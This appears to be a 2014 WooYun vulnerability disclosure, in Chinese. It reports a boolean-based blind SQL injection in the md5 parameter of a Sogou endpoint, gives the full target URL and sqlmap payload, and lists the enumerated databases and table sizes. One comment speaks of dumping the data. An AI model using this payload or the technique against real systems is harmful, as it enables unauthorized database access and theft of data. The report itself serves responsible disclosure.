当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-059168

漏洞标题:搜狗某应用SQL注射(泄漏NagiOS等敏感信息)

相关厂商:搜狗

漏洞作者: 超威蓝猫

提交时间:2014-05-02 13:21

修复时间:2014-06-16 13:22

公开时间:2014-06-16 13:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:19

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-02: 细节已通知厂商并且等待厂商处理中
2014-05-04: 厂商已经确认,细节仅向厂商公开
2014-05-14: 细节向核心白帽子及相关领域专家公开
2014-05-24: 细节向普通白帽子公开
2014-06-03: 细节向实习白帽子公开
2014-06-16: 细节向公众公开

简要描述:

有一个库中有近2亿条MD5,不知道是什么东西..

详细说明:

安装最新版本的"搜狗高速浏览器",打开后使用Burp抓包,发现浏览器对如下地址发起了一次HTTP请求:

http://tb.sogou.com/insert.php?url=http%3a%2f%2fse.cdn.sogou.com%2fapk_Install_2.2.0.12446.zip&md5=F918BF5773F2FC1569CC1974C1DF5742&size=2188000&mode=2&uid=2B754ADAC19E2444806FB84273D317CB


01.jpg


其中,md5参数存在布尔型盲注。
--count了一下发现nagios的库,应该是可以进一步渗透的。p4p库中有近两亿条MD5,不知道是什么东西..

漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: md5
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: url=http://se.cdn.sogou.com/apk_Install_2.2.0.12446.zip&md5=F918BF5773F2FC1569CC1974C1DF5742' AND 6498=6498 AND 'KOBd'='KOBd&size=2188000&mode=2&uid=2B754ADAC19E2444806FB84273D317CB
---
web application technology: Nginx, PHP 5.1.6
back-end DBMS: MySQL 5
available databases [10]:
[*] geoip
[*] information_schema
[*] ipmap
[*] mysql
[*] nagios
[*] p4p
[*] proxyservers
[*] pxpadmin
[*] server_status
[*] test
Database: geoip
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| ip | 77947 |
| cc | 233 |
+---------------------------------------+---------+
Database: nagios
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| nagios_hostchecks | 209759 |
| nagios_timedevents | 55842 |
| nagios_servicechecks | 55703 |
| nagios_logentries | 4999 |
| nagios_systemcommands | 3623 |
| nagios_statehistory | 1248 |
| nagios_host_contacts | 732 |
| nagios_objects | 228 |
| nagios_contact_notificationcommands | 216 |
| nagios_timedeventqueue | 126 |
| nagios_hoststatus | 122 |
| nagios_service_contacts | 116 |
| nagios_configfilevariables | 97 |
| nagios_contactnotificationmethods | 56 |
| nagios_contactnotifications | 48 |
| nagios_services | 36 |
| nagios_servicestatus | 36 |
| nagios_commands | 29 |
| nagios_flappinghistory | 26 |
| nagios_timeperiod_timeranges | 24 |
| nagios_processevents | 22 |
| nagios_contacts | 18 |
| nagios_contactstatus | 18 |
| nagios_runtimevariables | 18 |
| nagios_contactgroup_members | 16 |
| nagios_commenthistory | 13 |
| nagios_contact_addresses | 8 |
| nagios_contactgroups | 8 |
| nagios_notifications | 8 |
| nagios_timeperiods | 4 |
| nagios_conninfo | 3 |
| nagios_configfiles | 1 |
| nagios_dbversion | 1 |
| nagios_instances | 1 |
| nagios_programstatus | 1 |
+---------------------------------------+---------+
Database: proxyservers
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| proxy | 325 |
+---------------------------------------+---------+
Database: mysql
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| help_relation | 850 |
| help_topic | 484 |
| help_keyword | 404 |
| `user` | 74 |
| db | 37 |
| help_category | 36 |
| tables_priv | 23 |
| columns_priv | 6 |
+---------------------------------------+---------+
Database: test
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| mysql_mon | 331986 |
| checksums | 19413 |
+---------------------------------------+---------+
Database: ipmap
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| ipmap | 189618 |
+---------------------------------------+---------+
Database: server_status
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| mixer | 22386964 |
| mmsclient | 21797795 |
| castingflux | 6431398 |
| other | 591353 |
| tracker | 68015 |
| mixererror | 10073 |
| mmsclienterror | 10029 |
| castingerror | 2732 |
| othererror | 2724 |
| trackererror | 1322 |
| message | 566 |
+---------------------------------------+---------+
Database: pxpadmin
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| server | 349 |
| castingserv | 327 |
| CS_cur | 324 |
| resource | 120 |
| channel | 116 |
| idc | 19 |
| contacts | 16 |
| platform | 16 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 1239 |
| USER_PRIVILEGES | 451 |
| SCHEMA_PRIVILEGES | 438 |
| STATISTICS | 288 |
| KEY_COLUMN_USAGE | 269 |
| TABLE_PRIVILEGES | 231 |
| TABLE_CONSTRAINTS | 143 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126 |
| COLLATIONS | 126 |
| TABLES | 124 |
| CHARACTER_SETS | 36 |
| SCHEMATA | 10 |
| COLUMN_PRIVILEGES | 6 |
+---------------------------------------+---------+
Database: p4p
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| md5 | 183041418 |
| software | 73765030 |
| uid_list | 53470743 |
| deadlink | 9237028 |
| user_holding | 6508087 |
| movie | 3658157 |
+---------------------------------------+---------+

修复方案:

你们更专业:)

版权声明:转载请注明来源 超威蓝猫@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-05-04 16:45

厂商回复:

感谢支持!
欢迎到SGSRC提交搜狗漏洞,地址: http://

最新状态:

暂无


漏洞评价:

评论

  1. 2014-05-02 15:58 | 浅兮 ( 实习白帽子 | Rank:70 漏洞数:30 )

    额,这个我经常看到,不知道是什么!

  2. 2014-05-04 16:52 | 乐乐、 ( 普通白帽子 | Rank:853 漏洞数:189 )

    貌似厂商的话没说完~

  3. 2014-05-04 19:41 | 超威蓝猫 ( 核心白帽子 | Rank:1092 漏洞数:117 | STEAM_0:0:55968383)

    @乐乐、 乌云过滤链接

  4. 2014-05-27 17:08 | 李旭敏 ( 普通白帽子 | Rank:469 漏洞数:71 | ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎...)

    @乐乐、 被封杀了··

  5. 2014-06-16 16:59 | 小学猹 ( 实习白帽子 | Rank:81 漏洞数:30 | 暮春者,春服既成,冠者五六人,童子六七人...)

    要是我就拖了它,经常上传些奇怪的东西